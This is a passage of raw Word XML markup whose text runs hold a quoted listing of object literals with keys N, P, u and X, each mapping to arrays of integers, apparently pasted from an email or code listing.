      </w:r>
    </w:p>
    <w:p w14:paraId="39E3A24C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD61187" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B52AA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 72, 73]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F2FE2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BECA8C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71138C31" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F6331B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21135DAA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD07D7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C22AF14" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A3625D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C016A4B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D57974A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4453B5C5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A710FC5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22, 175]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E76E42A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721BF2CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353E909E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3ED7D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EB0FCC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9E3E5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79389969" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B624D74" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 5, 117]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55421BCE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64317E4F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C779AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5494185F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5077E0A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F184D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980F0DC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A504D5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5, 37, 255]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB74236" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473DB92" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3, 0, 4, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB5498" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA91C10" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [249, 282, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA691A3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E15EC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0BD461" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DF5851" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014BF56B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A12C31D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD4270D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EAD1CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [22, 23, 159, 245, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787F6229" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E5C40B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9EAB4C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 5, 6, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781E3927" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 4, 7, 8, 85]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A83965D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652C37BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C633236" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348A38AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AD36D1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511CADF7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544AC5DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [6, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53953654" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 4, 5, 7, 9, 10, 11, 13, 14, 15, 16, 23, 35, 218, 238, 333]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E521134" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6AC5D1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1433B92C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F538316" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D89C03" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE601B2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBE501" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED1AF4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2FAFF9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7EB92D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1492C566" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB898F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C912EF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E82872" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0964A483" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7507FC3F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E64E1BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [68, 150, 213, 254, 276]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F34FC62" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC30494" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A939ED3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C40BE46" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [26, 100, 255]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD0510E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C266D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EF4CE0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1764E4E6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE15E3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758A6021" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896DACE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5504C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3, 4, 5, 6, 8, 12, 15, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA41384" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 7, 9, 10, 11, 13, 14, 16, 23, 218]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D79A8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980FF8B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D8455A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E9369A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 19, 90]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E0B8E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7021E1E9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE494BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022B027C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470B1122" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9D2723" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF335C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662880E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0A517B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE4D811" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5941CBBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31B0AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2953E4B2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12794035" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A0E5EE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A1A989" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF1D0F3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9CE80" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A3BE46" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C738A2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD450FA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F337485" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1409C2CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5582D397" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FC2CA3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63492874" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A1CFAC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A8B1AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB542E4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D40723" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5122892E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F57DC8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         P: [0, 2, 3, 5, 7, 8, 9, 10, 11, 13, 14, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E733DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 4, 6, 12, 19, 26, 40, 51, 58, 70, 75, 86, 87, 90, 102, 129, 130, 141, 169, 192, 206, 211, 231, 249, 251, 253, 274, 282, 286, 344,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD15FF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t xml:space="preserve"> 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3901D5BE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1671A867" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21562ABF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 7, 8, 9, 10, 11, 14, 15, 19, 20, 21, 22, 31, 34, 36, 37],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B2A520" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 12, 13, 16, 17, 18, 23, 24, 25, 26, 27, 28, 29, 30, 32, 33, 35, 159, 245, 311, 317, 352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7577E5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
